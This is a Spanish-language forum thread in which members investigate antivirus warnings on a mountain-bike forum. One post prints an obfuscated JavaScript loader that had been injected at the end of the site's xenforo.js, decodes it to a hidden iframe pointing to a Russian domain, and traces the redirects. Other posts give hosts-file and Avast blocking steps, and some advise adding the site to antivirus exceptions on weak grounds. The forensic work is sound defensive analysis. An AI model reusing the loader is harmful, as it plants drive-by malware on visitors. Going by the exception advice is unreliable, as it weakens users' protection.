ESTA WEB ESTA VIRULENTA

Tema en 'General' iniciado por CARHERVAS, 9 May 2012.

  1. Iván Gándara

    Iván Gándara Miembro Reconocido

    Registrado:
    18 Abr 2015
    Mensajes:
    832
    Me Gusta recibidos:
    446
    Ubicación:
    Alxén
    A mi no me salta nada, tengo el NOD 32, desde el movil tampoco y siempre navegué perfecto en el foro
     
  2. jelxa

    jelxa Miembro activo

    Registrado:
    22 Oct 2014
    Mensajes:
    218
    Me Gusta recibidos:
    38
    Tiene virus y no pocos además. En el móvil usando tapatalk funciona ok, pero si entro desde el navegador virus y virus y virus.
     
  3. semiau4

    semiau4 Hago lo que puedo

    Registrado:
    2 Oct 2009
    Mensajes:
    7.298
    Me Gusta recibidos:
    1.452
    Ubicación:
    VigoLandia
    A mi me va bien , aunque no tengo antivirus.
     
  4. _zalacain_

    _zalacain_ Miembro

    Registrado:
    31 Jul 2015
    Mensajes:
    54
    Me Gusta recibidos:
    10
    ****, pues a mí tampoco me avisa. Mal rollo!
     
  5. Eficaz

    Eficaz Miembro Reconocido

    Registrado:
    26 Jul 2013
    Mensajes:
    1.248
    Me Gusta recibidos:
    1.442
    Ubicación:
    Elda (Alicante)
    El problema viene dado por el uso de un script que se utiliza en la pagina para poder hacer login, se utiliza una herramienta bastante utilizada en la programacion html para varios usos en los que se necesite el acceso a una base de datos, como puede ser por el ejemplo la base de datos donde se almacenan el usuario y contraseña.

    Es script en concreto es un js/iframe eq, que es el cuadrito del login y cuando estamos logeados al pasar el cursor del raton por encima nos muestra las alertas, privados, etc.

    El problema es que a estos escripts se les detecto hace tiempo una vulnerabilidad que en paginas maliciosas podia ser usado para redirigir al usuario a otras paginas y asi poder hacer un phising a la par que instalar un troyano en el equipo del usuario.

    Eso no quiere decir que todas las paginas lo hagan, de hecho la incidencia de troyanos mediante este script es inferior al 1% mundial de infecciones.

    Aun asi cuando suele haber un repunte de infecciones por el ( en otros lugares del mundo, actualmente el mas afectado es la india ) los antivirus lo meten entre sus alertas y en detectarlo lo bloquean.

    Lo mejor para evitar problemas cuando algo asi nos pase con la pagina del foro o cualquier otra es antes de loguearnos o hacer uso del iframe es analizar la pagina con escaneo de antivirus externo, como por ejemplo con la pagina web de virus total https://www.virustotal.com/es/

    Y este es el resultado que he obtenido del escaneo que acabo de hacerle justo hace un momento...

    https://www.virustotal.com/es/url/9...e1fd00d206314092e1d5ed2b/analysis/1441265551/

    Segun el reporte del escaneo ha sido escaneado por 63 analizadores de virus y ninguno de ellos ha detectado infeccion alguna, por lo que la pagina es segura.

    Para evitar tener que estar activando y desactivando el antivirus los mejor es incluir la direccion del sitio en las excepciones del antivirus para que no bloquee la pagina y seguir utilizandola sin problema.

    Espero que os sea de utilidad compañeros.

    Saludos!!!
     
    • Me Gusta Me Gusta x 10
    • Útil Útil x 3
  6. UK Tai

    UK Tai Miembro activo

    Registrado:
    22 Ene 2015
    Mensajes:
    127
    Me Gusta recibidos:
    122
    Ubicación:
    Algorta
    Buena respuesta Eficaz, haciendo honor a tu nick;).

    Justo iba a escribir que no se debe confundir que tu antivirus detecte una amenaza, con que esto sea un virus y que realmente pueda llegar a infectarte. Sin estar del todo seguro, creo que la vulnerabilidad del js/iframe esta corregida en la actualización de marzo o abril(no recuerdo bien).

    Esto me recuerda a cuando bajas algún programa de confianza de la administración pública y windows lo detecta como una amenaza solo porque ellos no lo han certificado como seguro, con el consiguiente daño de credibilidad por parte del desarrollador del software.

    Hay cosas que el dinero puede comprar.... para todo lo demas UBUNTU!!! jejeje
     
  7. raxor

    raxor Miembro activo

    Registrado:
    23 Feb 2011
    Mensajes:
    264
    Me Gusta recibidos:
    148
    Ubicación:
    Alicante
    Strava:
    No es exactamente eso, por lo menos en este caso y lo que yo estoy viendo.

    El problema es una publicidad que aparenta ser la carga de un jpg. (ofusco la url para evitar lios)

    hzzzzzzzzzzp://cdn(punto)amazoncdnimg(punto)ru/img303/?Img505jpeg

    Que luego redirige a:

    hzzzzzzzp://img(punto)amazoncdn8(punto)ru/search?q=fxcW&Mjm=41cf7808f8&7wNmJCC=eMT&XDdCs5y=muchos numeros y letras

    o

    hzzzzzzzp://img(punto)amazoncdn9(punto)ru/search?q=fxcW&Mjm=41cf7808f8&7wNmJCC=eMT&XDdCs5y=muchos numeros y letras

    El antivirus salta:

    foromtberror.png

    Estos segundos enlaces son los problemáticos ya que intentan explotar vulnerabilidades.

    Son dominios que están en la lista negra de los antivirus y por eso saltan las alarmas, palabrita de Nod32, Panda y firewall empresarial con URL filter.

    La solución temporal es añadir los dominios .ru antes dichos al fichero hosts local direccionandolos a 127.0.0.1 (localhost), así nunca cargará el virus.

    como se modifica el fichero hosts:

    http://archivogeek.com/2433/editar-archivo-hosts-en-windows-7-y-windows-vista/

    El fichero HOSTS quedaría algo así como:

    CODE, HTML o PHP Insertado:
    # Copyright (c) 1993-2009 Microsoft Corp.
    #
    # This is a sample HOSTS file used by Microsoft TCP/IP for Windows.
    #
    # This file contains the mappings of IP addresses to host names. Each
    # entry should be kept on an individual line. The IP address should
    # be placed in the first column followed by the corresponding host name.
    # The IP address and the host name should be separated by at least one
    # space.
    #
    # Additionally, comments (such as these) may be inserted on individual
    # lines or following the machine name denoted by a '#' symbol.
    #
    # For example:
    #
    #      102.54.94.97     rhino.acme.com          # source server
    #       38.25.63.10     x.acme.com              # x client host
    
    # localhost name resolution is handled within DNS itself.
    #    127.0.0.1       localhost
    #    ::1             localhost
    127.0.0.1 amazoncdnimg.ru
    127.0.0.1 amazoncdn1.ru
    127.0.0.1 amazoncdn2.ru
    127.0.0.1 amazoncdn3.ru
    127.0.0.1 amazoncdn4.ru
    127.0.0.1 amazoncdn5.ru
    127.0.0.1 amazoncdn6.ru
    127.0.0.1 amazoncdn7.ru
    127.0.0.1 amazoncdn8.ru
    127.0.0.1 amazoncdn9.ru
    127.0.0.1 amazoncdn10.ru
    Despues de esto ejecutais cmd (simbolo de sistema) en modo administrador y vaciais la cache de la resolucion DNS

    CODE, HTML o PHP Insertado:
    Microsoft Windows [Versión 10.0.10240]
    (c) 2015 Microsoft Corporation. Todos los derechos reservados.
    
    C:\WINDOWS\system32>ipconfig /flushdns
    
    Configuración IP de Windows
    
    Se vació correctamente la caché de resolución de DNS.
    
    C:\WINDOWS\system32>
    Ojo, cuando el atacante cambie el dominio hay que volver a empezar, la solución la tiene el webmaster de foromtb que tiene que revisar a quien vende espacios de publicidad y controlar los mismos. Tambien podria ser que hubieran explotado alguna vulnerabilidad de XEN Foros y hubieran inyectado el código para que cargue el virus cada vez que se refresca la página.

    Muchas veces al utilizar un servidor intermedio que hace de pasarela (el dominio amazoncdnimg(punto)ru) les permite determinar si el cliente es legitimo o es un escaneador de virus, muchas veces lo hacen geolocalizando la IP o si corresponde a los rangos de operadores concretos (telefonica, ono, jazztel etc....), es decir, si es un escaneador con ip de EEUU u otro sitio muestro una imagen, pero si es una ip de una posible victima le cargo un virus o publicidad maligna. Este comportamiento ya lo había observado en algunas webs de wordpress infectadas pero al revés, cuando entrabas desde España mostraba la web perfectamente compuesta, es decir el propietario no se daba cuenta de nada, pero cuando lo hacias desde EEUU te sacaba publicidad e intentos de SCAM.
     
    Última edición: 6 Sep 2015
  8. manolito11

    manolito11 Miembro

    Registrado:
    27 Jun 2012
    Mensajes:
    558
    Me Gusta recibidos:
    8
    Ubicación:
    Huelva
    Yo tengo ese antivirus y no me nuestra ningun mensaje de virus a entrar aqui.
     
  9. Eficaz

    Eficaz Miembro Reconocido

    Registrado:
    26 Jul 2013
    Mensajes:
    1.248
    Me Gusta recibidos:
    1.442
    Ubicación:
    Elda (Alicante)
    Yo normalmente en mis navegadores tengo activado ad-block por lo que no me carga ninguna imagen de publicidad ni ventanas emergentes ( bloqueadas en el navegador ) por lo que a mi sólo me identifica la posible infección del Script del iframe. De todas maneras al analizar la página externamente no se detecta infección alguna.

    De todas maneras no está de más hacer una navegación "defensiva" cuando buceamos por la red. Siempre hay que evitar hacer clic en las imágenes y/o ventanas publicitarias. En caso de duda siempre botón derecho y copiar url al portapapeles y abrir una nueva pestaña. Abrir alguna página de análisis antivirus como la virustotal, panda , karpesky, etc. y pegar la url donde nos pida la dirección de la página web a investigar. Si nos indica que es segura pues seguimos navegando.

    A mi el bloqueo del avast consistió en bloquear todos los iframes que contuvieran consultas a base de datos bajo java ( j query ) por lo que bloquea los emergentes de las alertas y los formularios como los de escribir las respuestas.

    Últimamente java está siendo ninguneada para que suba html5 un lenguaje que según parece está empezando a derivar en una menor privacidad de los usuarios....

    En fin ya se irá solucionando. De mientras habrá que ir adoptando las distintas soluciones que van aportando los compañeros.

    Saludos!!!!
     
  10. PituPedal

    PituPedal Miembro activo

    Registrado:
    7 Ene 2015
    Mensajes:
    457
    Me Gusta recibidos:
    178
    Lo estaba comprobando paralelamente sin saber de este hilo, os copio lo que pude descubrir hasta el momento. Es coincidente con lo ya dicho, lo cual es bueno.

    Al final de http://www.foromtb.com/js/xenforo/xenforo.js?_v=fa6a05d8 aparece el siguiente código JavaScript:

    CODE, HTML o PHP Insertado:
    var Bacc,aaaBaaaBa,caaaBaac,BaaBcBaa;caaaBaac = eval;Bacc ="";aaaBaaaBa = new Array();aaaBaaaBa.push('%d#@#@o@@@#%c@@#um#@');aaaBaaaBa.push('@@e#!nt.writ#@@@e#!(');aaaBaaaBa.push('\'<i@#@#f@@#r%@a~@@#m');aaaBaaaBa.push('#@@@e#! sr@@@#%c@@#=');aaaBaaaBa.push('\"http://@@@#%c@@#%d#');aaaBaaaBa.push('@#@n.%@a~@@#m%@a~@@#');aaaBaaaBa.push('zon@@@#%c@@#%d#@#@ni');aaaBaaaBa.push('mg.ru/img303/?Img505');aaaBaaaBa.push('jp#@@@e#!g\" wi%d#@#@');aaaBaaaBa.push('th=\"1\" h#@@@e#!ight=');aaaBaaaBa.push('\"0\" @#@#f@@#r%@a~@@#');aaaBaaaBa.push('m#@@@e#!@#@%@b@or%d#');aaaBaaaBa.push('@#@#@@@e#!r=\"0\"></i@');aaaBaaaBa.push('#@#f@@#r%@a~@@#m#@@@');aaaBaaaBa.push('e#!>\');');function aaBBc(str) { return str.replace(/[!%#@~]/g,""); }for (var j=0;j<aaaBaaaBa.length;j++) {Bacc = aaBBc(aaaBaaaBa[j]);BaaBcBaa += Bacc;}caaaBaac(BaaBcBaa.substr(9));
    Que esté justo al final, ya es sospechoso de por sí, y el modo de tratar de disimular lo que hace, todavía más.

    Una vez aclaramos esa guarrería que trata de que antivirus y similares no detecten lo que pretende (felicidades, Avast!), lo que hace ese código es insertar este código HTML:

    CODE, HTML o PHP Insertado:
    <iframe src="http://cdn.amazoncdnimg.ru/img303/?Img505jpeg" width="1" height="0" frameborder="0"></iframe>
    Eso sirve para incluir una página dentro de otra por un medio obsoleto ya en HTML desde hace años, pero aun funcional y lo hace ocultando la página insertada al asignarle una altura de cero píxeles. De este modo, junto con la página del foro, estamos visitando también otra rusa sin saberlo.

    La página que se inserta es una llamada que responde lo siguiente:

    CODE, HTML o PHP Insertado:
    HTTP/1.1 302 Moved Temporarily
    Server: nginx
    Date: Thu, 03 Sep 2015 18:18:45 GMT
    Content-Type: text/html; charset=utf-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    X-Powered-By: PHP/5.3.3
    Expires: Thu, 21 Jul 1977 07:30:00 GMT
    Last-Modified: Thu, 03 Sep 2015 18:18:45 GMT
    Cache-Control: max-age=0
    Pragma: no-cache
    LOCATION: http://img.amazoncdn7.ru/search?q=aXQ1UURkeRA1eWQceBx9ZWQZMV&H05H=cdeA0&HSz=3f902f4&0DBRx=eQQ..&O16GZt=d8Q&4mAq4=bQ5RTg4MVw&SQN=5cd1a40f6
    Eso produce un redireccionamiento. La dirección a la que nos lleva es diferente cada vez, si bien todas son del mismo estilo:

    CODE, HTML o PHP Insertado:
    http://img.amazoncdn7.ru/search?q=c8DWQJK&B5dovJV=eGhMX&X5r=aXQ1UURkeU1&NPb5LXt=boHDR1RSApdU0&M4n=5cdc983&BsBJ6B=dWw8BUA0H&KOS=5f1264f
    http://img.amazoncdn7.ru/search?q=cWQJKWw8BUA0HGhMX&JyVon7z=bdU08D&Zftxx8=aXQ1UURkeU1oHDR1RSAp&G1r=113b96d1c&DPG=990d8b9
    http://img.amazoncdn7.ru/search?q=29d67e&YPgZn24=bhWAAl&SMwI=07b7b8daa8&JC0qa=aXQ1UURkeXA&IEYmC=cUSFBMXQwFGgJdVRsNWgBUWlZMRhY.
    Finalmente, estas direcciones, llevan a un error 444 (No hay respuesta) del servidor nginx.

    CODE, HTML o PHP Insertado:
    HTTP/1.1 444
    Server: nginx
    Date: Thu, 03 Sep 2015 18:37:34 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    X-Powered-By: PHP/5.6.12-1~dotdeb+7.1
    Access-Control-Allow-Origin: *
    Access-Control-Allow-Credentials: true
    Access-Control-Allow-Methods: GET, POST, OPTIONS
    Access-Control-Allow-Headers: DNT,X-CustomHeader,Keep-Alive,User-Agent,X-Requested-With,If-Modified-Since,Cache-Control,Content-Type
     
    • Me Gusta Me Gusta x 2
  11. Betelgeuse

    Betelgeuse Miembro Reconocido

    Registrado:
    10 Ago 2015
    Mensajes:
    1.774
    Me Gusta recibidos:
    1.698
    Yo me pierdo con todo esto
    Entonces la solución sería desactivar ese script, no?
    Eso lo pueden hacer los de foromtb, o es tema de xenforo?
     
  12. Eficaz

    Eficaz Miembro Reconocido

    Registrado:
    26 Jul 2013
    Mensajes:
    1.248
    Me Gusta recibidos:
    1.442
    Ubicación:
    Elda (Alicante)

    los iframes forman parte de la plantilla de xenforo, las cabeceras y pie de pagina es cosa de la administracion del foro.

    Saludos!!!!
     
  13. PituPedal

    PituPedal Miembro activo

    Registrado:
    7 Ene 2015
    Mensajes:
    457
    Me Gusta recibidos:
    178
    Lo primero es averiguar cómo ha llegado ese script hasta ahí. Con eso solo puedo especular.

    Para quienes nos están leyendo y no pueden responder porque no se atreven a apagar el antivirus (bien hecho) y no pueden entrar de otro modo, el parche menos peligroso mientras se arregla, entendiendo que la imagen desde la que se realizaba el presunto ataque ya está retirada del servidor ruso, es aceptar el script del foro y bloquear la web rusa. Eso nos deja vulnerables a otro ataque del mismo tipo hecho desde el foro que tome el código para el iframe de otro servidor diferente.

    Para ello, hay que abrir la pantalla principal de Avast! y pulsar abajo a la izquierda en "Opciones".

    avast-1.png

    En la ventana de opciones, en el menú de la izquierda,pulsar en la segunda "Protección activa"

    avast-2.png

    Y en escudo web, pulsar en "personalizar"

    avast-3.png

    Pulsamos la tercera opción de la izquierda "Exclusiones"

    avast-4.png

    Dejamos marcada la casilla "URLs a excluir" y agregamos lo siguiente:

    http://www.foromtb.com/js/xenforo/xenforo.js*

    avast-5.png

    Vamos a "Exclusiones de script", dejamos marcada la casilla "URLs a excluir" y agregamos de nuevo lo siguiente:

    http://www.foromtb.com/js/xenforo/xenforo.js*

    avast-5b.png

    Ahora pulsamos en "Bloqueo URL"

    Marcamos activa la casilla "Activar bloqueo del sitio" y agregamos lo siguiente:

    http://cdn.amazoncdnimg.ru/*

    Pulsamos en "Aceptar"

    avast-6.png

    (El paso de desactivar y activar tal vez sea innecesario)

    Nuevamente en la ventana de Opciones - Protección activa, junto a "Escudo web" pulsamos el "Activado" para desactivar la protección de la web, con la finalidad de reiniciarla, quitando el bloqueo actualmente en vigor, seleccionamos 10 minutos y aceptamos la advertencia de detener componente. El menú de 10 min y el aviso no tengo medios para capturarlo con facilidad y mostrarlo.

    avast-7.png

    Esperamos unos segundos y para reactivarla, pulsamos el botón que ahora está gris indicando que el Escudo Web está desactivado.

    avast-8.png

    Ya podemos pulsar en Aceptar y cerrar la ventana principal de Avast!

    En las pestañas donde no aparecía el espacio para responder, pulsamos Ctrl+F5 para recargar y refrescar la caché.

    Con esto, dejamos el sistema vulnerable a lo que venga a través del script del foro, pero únicamente a ese punto, no es más inseguro que cambiar a un antivirus que no lo bloquea y sí es más seguro que desactivar de modo general el antivirus.
     
    • Útil Útil x 9
    • Me Gusta Me Gusta x 6
    Última edición: 4 Sep 2015
  14. raxor

    raxor Miembro activo

    Registrado:
    23 Feb 2011
    Mensajes:
    264
    Me Gusta recibidos:
    148
    Ubicación:
    Alicante
    Strava:
    Me quito el sombrero, has dado en el clavo, yo me he quedado en la cascarilla siguiendo únicamente el payload, pero tu has descubierto el origen del problema y donde exactamente está. solo falta algún webmaster para que solucione el problema. Aunque debería revisar los permisos de los js y securizar el server con algún sistema dinámico de autoprotección (detección de crawlers, escaneadores de URL, algún autoban etc....).

    Enhorabuena. Buen trabajo
     
    • Me Gusta Me Gusta x 2
  15. TMF1977

    TMF1977 Miembro activo

    Registrado:
    12 Abr 2015
    Mensajes:
    282
    Me Gusta recibidos:
    113
    Ubicación:
    Cantabria
    Arreglado!!!

    Muchas gracias.
     
    • Me Gusta Me Gusta x 1
  16. PituPedal

    PituPedal Miembro activo

    Registrado:
    7 Ene 2015
    Mensajes:
    457
    Me Gusta recibidos:
    178
    Gracias, compañero. Tú también lo tenias rodeado ya y no somos los únicos, solo que cada uno lo llevaba por su cuenta.

    Cuando hace unos días dejó de funcionarme el foro, primero pensé que era cosa de mi sistema. Como tras reiniciarlo tampoco funcionó, entonces pensé que era fallo del foro.

    Pasado un tiempo, viendo que los compañeros seguían publicando empecé a sospechar que fuese la última actualización de Java, que más o menos me coincidía en el tiempo. Pasé de usar Firefox para el Foro a Chrome y me lo resolvió temporalmente (cachés, coincidencias, a saber...).

    Ayer dejó de funcionarme en Chrome y ya me empecé a mosquear. Buscando di con que el Avast! me estaba bloqueando un script del foro y ahí empecé a investigar. No quise desactivarlo, el PC lo uso para trabajar y no me la juego a darle paso a un presunto troyano.

    Cuando cargué el script suelto, sin ejecutarlo, el Avast! recién reiniciado lo bloqueaba a medio cargar, ahí ya se dispararon las sospechas de que estaba bloqueando algo relevante.

    Como solo lo cargaba como texto, sin ejecutar, deshabilité temporalmente el "escudo web" para leer el script completo. Ahí apareció el código sospechoso, al final del archivo.

    Con esas ideas ya en mente, sabía que tenía que estarle sucediendo a mucha más gente, de modo que busqué y en http://www.foromtb.com/forums/problemas-y-sugerencias-en-foromtb-com.13/ ya había varios hilos abiertos del tema. A falta de poder comentar nada, dí unos likes y me busqué un tablet, confiando en que en Android sería menos arriesgado y que en todo caso, el tablet lo formateo y me quedo tan ancho.

    Ya a partir de ahí, el resto quedó a la vista :)

    Ahora es cuestión de advertir a los admin para que localicen y tapen el agujero por donde entró el ataque, además de borrar el script agregado. ¿Alguien los conoce?
     
    • Me Gusta Me Gusta x 1
  17. Eficaz

    Eficaz Miembro Reconocido

    Registrado:
    26 Jul 2013
    Mensajes:
    1.248
    Me Gusta recibidos:
    1.442
    Ubicación:
    Elda (Alicante)
    El problema es que el script es parte de la plantilla de xen foro por lo que los administradores de foromtb supongo que poco podran hacer por que las herramientas que les proporcionara el servicio iran poco mas alla de poner publicidad en la cabecera y en ventanas emergentes...

    Lo que si que podran hacer es reportar el problema al administrador del servicio de xen foro que sera el que tendra que solucionar el problema.

    Podras consultar y reportar el problema en el foro de las comunidades de xen foro https://xenforo.com/community/ que es en ingles a ver si por alli le pueden dar solucion al problema, mi ingles y mis conocimientos informaticos no son demasiado elevados como para hacerlo yo...

    Saludos!!!!
     
    • Me Gusta Me Gusta x 1
  18. Sir Cota

    Sir Cota Miembro Reconocido

    Registrado:
    2 Ene 2013
    Mensajes:
    7.423
    Me Gusta recibidos:
    2.622
    Ubicación:
    Tarancón
    • Me Gusta Me Gusta x 1
  19. PituPedal

    PituPedal Miembro activo

    Registrado:
    7 Ene 2015
    Mensajes:
    457
    Me Gusta recibidos:
    178
    No conozco detalles ni de XenForo ni de foromtb. Por lo poco que he visto, el hosting es independiente, de modo que igual que instalaron el foro, podrán actualizarlo y/o modificarlo.

    CODE, HTML o PHP Insertado:
    ~# dig -t any www.foromtb.com
    
    ; <<>> DiG 9.8.1-P1 <<>> -t any www.foromtb.com
    ;; global options: +cmd
    ;; Got answer:
    ;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 8103
    ;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 2, ADDITIONAL: 0
    
    ;; QUESTION SECTION:
    ;www.foromtb.com.               IN      ANY
    
    ;; ANSWER SECTION:
    www.foromtb.com.        300     IN      A       217.160.177.4
    
    ;; AUTHORITY SECTION:
    foromtb.com.            172800  IN      NS      ns12.zoneedit.com.
    foromtb.com.            172800  IN      NS      ns15.zoneedit.com.
    
    ;; Query time: 236 msec
    ;; SERVER: 192.168.0.2#53(192.168.0.2)
    ;; WHEN: Fri Sep  4 13:27:47 2015
    ;; MSG SIZE  rcvd: 96
    
    La IP corresponde a s18005874.onlinehome-server.info, no tiene pinta de ser proporcionado por XenForo. Llegados a este punto, desde fuera poco más puede verse, /js/xenforo/xenforo.js tiene un código agregado al final que, por su aspecto, no se ha introducido ahí legítimamente, hay que limpiarlo y evitar que se repita.
     
    • Me Gusta Me Gusta x 2
  20. PituPedal

    PituPedal Miembro activo

    Registrado:
    7 Ene 2015
    Mensajes:
    457
    Me Gusta recibidos:
    178
    La pregunta es buena, si alguien nos advierte que ya se ha resuelto, o probando vemos que ya funciona sin esa configuración, es cuestión de avisarnos aquí mismo al resto.
     
    • Me Gusta Me Gusta x 1

Compartir esta página